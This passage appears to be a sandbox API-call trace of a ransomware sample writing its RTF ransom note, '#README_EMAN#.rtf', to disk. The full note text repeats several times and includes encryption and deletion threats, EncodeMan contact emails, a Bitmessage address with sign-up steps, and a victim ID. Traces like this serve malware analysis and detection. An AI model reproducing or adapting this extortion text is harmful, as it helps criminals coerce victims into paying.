s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.693] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.694] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.694] CloseHandle (hObject=0x27c) returned 1 [0301.694] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\#readme_eman#.rtf")) returned 0xffffffff [0301.694] GetLastError () returned 0x2 [0301.694] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\be\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\be\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 